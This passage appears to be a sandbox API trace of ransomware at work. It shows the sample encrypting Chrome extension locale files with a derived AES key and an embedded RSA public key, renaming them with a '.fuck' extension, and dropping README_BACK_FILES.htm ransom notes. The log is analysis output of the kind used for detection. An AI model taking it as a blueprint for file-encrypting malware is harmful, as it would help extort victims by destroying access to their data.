(hFile=0x5d50) returned 0x1 [0255.408] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.410] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.410] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e18128 [0255.411] FindNextFileA (in: hFindFile=0x2e18128, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.411] FindNextFileA (in: hFindFile=0x2e18128, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.411] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.411] GetLastError () returned 0x0 [0255.411] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json")) returned 0x20 [0255.411] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json", dwFileAttributes=0x80) returned 1 [0255.412] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.412] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.414] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.415] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.417] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.417] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0255.417] CryptHashData (hHash=0x2e18828, pbData=0x28cb328, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.417] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18828, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e180e8) returned 1 [0255.417] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.417] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.417] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e112c0) returned 1 [0255.417] CryptImportPublicKeyInfo (in: hCryptProv=0x2e112c0, dwCertEncodingType=0x1, pInfo=0x2990ca0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2990cd0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2990cd8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18ae8) returned 1 [0255.417] CryptEncrypt (in: hKey=0x2e18ae8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.418] CryptEncrypt (in: hKey=0x2e18ae8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e119a8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e119a8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.418] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e119a8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e119a8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.419] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x96, lpOverlapped=0x0) returned 1 [0255.420] CryptEncrypt (in: hKey=0x2e180e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x96, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xa0) returned 1 [0255.420] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xa0, lpOverlapped=0x0) returned 1 [0255.420] CloseHandle (hObject=0x5d60) returned 1 [0255.420] CloseHandle (hObject=0x5d5c) returned 1 [0255.420] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json"), bFailIfExists=0) returned 1 [0255.423] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json", dwFileAttributes=0x0) returned 1 [0255.424] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json.gsg")) returned 1 [0255.425] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json.fuck")) returned 1 [0255.426] CryptDestroyHash (hHash=0x2e18828) returned 1 [0255.426] CryptDestroyKey (hKey=0x2e180e8) returned 1 [0255.426] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.426] FindNextFileA (in: hFindFile=0x2e18128, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.426] FindClose (in: hFindFile=0x2e18128 | out: hFindFile=0x2e18128) returned 1 [0255.427] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\readme_back_files.htm")) returned 0xffffffff [0255.427] AreFileApisANSI () returned 1 [0255.427] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3af0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0255.427] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.428] GetFileType (hFile=0x5d50) returned 0x1 [0255.428] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.429] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.429] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0255.429] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.429] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.429] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.430] GetLastError () returned 0x0 [0255.430] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json")) returned 0x20 [0255.430] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json", dwFileAttributes=0x80) returned 1 [0255.431] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.431] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.432] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.432] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.435] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.435] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0255.435] CryptHashData (hHash=0x2e18128, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.435] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18828) returned 1 [0255.435] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.435] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.436] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e11e70) returned 1 [0255.436] CryptImportPublicKeyInfo (in: hCryptProv=0x2e11e70, dwCertEncodingType=0x1, pInfo=0x2990e40*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2990e70*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2990e78*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18b68) returned 1 [0255.436] CryptEncrypt (in: hKey=0x2e18b68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.436] CryptEncrypt (in: hKey=0x2e18b68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e11ef8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e11ef8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.436] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e11ef8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e11ef8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.438] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb4, lpOverlapped=0x0) returned 1 [0255.439] CryptEncrypt (in: hKey=0x2e18828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb4, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0255.439] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0255.439] CloseHandle (hObject=0x5d5c) returned 1 [0255.439] CloseHandle (hObject=0x5d60) returned 1 [0255.439] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json"), bFailIfExists=0) returned 1 [0255.443] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json", dwFileAttributes=0x0) returned 1 [0255.443] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json.gsg")) returned 1 [0255.445] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json.fuck")) returned 1 [0255.446] CryptDestroyHash (hHash=0x2e18128) returned 1 [0255.446] CryptDestroyKey (hKey=0x2e18828) returned 1 [0255.446] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.446] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.447] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0255.447] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\readme_back_files.htm")) returned 0xffffffff [0255.447] AreFileApisANSI () returned 1 [0255.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0255.447] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.448] GetFileType (hFile=0x5d50) returned 0x1 [0255.448] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.450] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.450] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e186a8 [0255.451] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.451] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.452] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.452] GetLastError () returned 0x0 [0255.452] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_br\\messages.json")) returned 0x20 [0255.452] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json", dwFileAttributes=0x80) returned 1 [0255.453] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.454] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_br\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.454] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.455] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.458] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) 